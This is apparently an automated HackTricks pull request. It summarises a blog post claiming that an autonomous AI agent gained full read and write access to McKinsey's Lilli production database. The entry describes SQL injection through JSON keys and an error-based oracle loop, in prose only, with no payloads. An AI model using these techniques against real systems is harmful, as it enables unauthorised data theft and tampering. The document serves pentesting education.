Skip to content

How We Hacked McKinsey's AI Platform#1973

Open
carlospolop wants to merge 1 commit intomasterfrom
update_How_We_Hacked_McKinsey_s_AI_Platform_20260309_185218
Open

How We Hacked McKinsey's AI Platform#1973
carlospolop wants to merge 1 commit intomasterfrom
update_How_We_Hacked_McKinsey_s_AI_Platform_20260309_185218

Conversation

@carlospolop
Copy link
Collaborator

🤖 Automated Content Update

This PR was automatically generated by the HackTricks News Bot based on a technical blog post.

📝 Source Information

  • Blog URL: https://codewall.ai/blog/how-we-hacked-mckinseys-ai-platform
  • Blog Title: How We Hacked McKinsey's AI Platform
  • Suggested Section: Pentesting Web -> SQL Injection (add subsection on SQLi via JSON keys / identifier injection; include notes on error-based oracle exploitation and why scanners miss key-fuzzing)

🎯 Content Summary

Title/Context
McKinsey’s internal AI platform “Lilli” (launched 2023) provides chat, document analysis, and RAG/search across 100,000+ internal documents for 43,000+ employees (adopted by 70%+; 500,000+ prompts/month). The post claims an autonomous offensive agent (no credentials, no insider knowledge, no human-in-the-loop) achieved full read and write access to the production database within ~2 hours using only the exposed attac...

🔧 Technical Details

SQLi via JSON key/identifier injection
If an API builds SQL dynamically using user-controlled JSON object keys (field names) and concatenates them into the query string, parameterizing only the values does not prevent SQL injection. Attackers can place SQL fragments in the JSON key positions (identifier injection). This class of SQLi is commonly missed by scanners that only fuzz values, so testing must include fuzzing keys/field names and any server-side mapping that turns JSON object properties into SQL identifiers.

Error-based feedback loop to derive “query shape”
When the backend returns database errors that reflect attacker-controlled input (including JSON keys), those errors act as an oracle. An attacker can iterate: inject malformed syntax → read the error → infer where the input lands in SQL → refine payload. Repeating this across multiple requests can transition from blind probing to valid injected SQL and reliable data extraction.
<br/...

🤖 Agent Actions

Summary:
Added a new subsection on SQLi via JSON keys/identifier injection, error-based oracle usage, and why scanners miss key-fuzzing.
Added the blog URL to the References section.

Files updated:

  • src/pentesting-web/sql-injection/README.md

Tests:

  • Not run (not applicable).

If you want tweaks to wording or placement, tell me where you’d like it adjusted.


This PR was automatically created by the HackTricks Feed Bot. Please review the changes carefully before merging.

@carlospolop
Copy link
Collaborator Author

🔗 Additional Context

Original Blog Post: https://codewall.ai/blog/how-we-hacked-mckinseys-ai-platform

Content Categories: Based on the analysis, this content was categorized under "Pentesting Web -> SQL Injection (add subsection on SQLi via JSON keys / identifier injection; include notes on error-based oracle exploitation and why scanners miss key-fuzzing)".

Repository Maintenance:

  • MD Files Formatting: 954 files processed

Review Notes:

  • This content was automatically processed and may require human review for accuracy
  • Check that the placement within the repository structure is appropriate
  • Verify that all technical details are correct and up-to-date
  • All .md files have been checked for proper formatting (headers, includes, etc.)

Bot Version: HackTricks News Bot v1.0

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant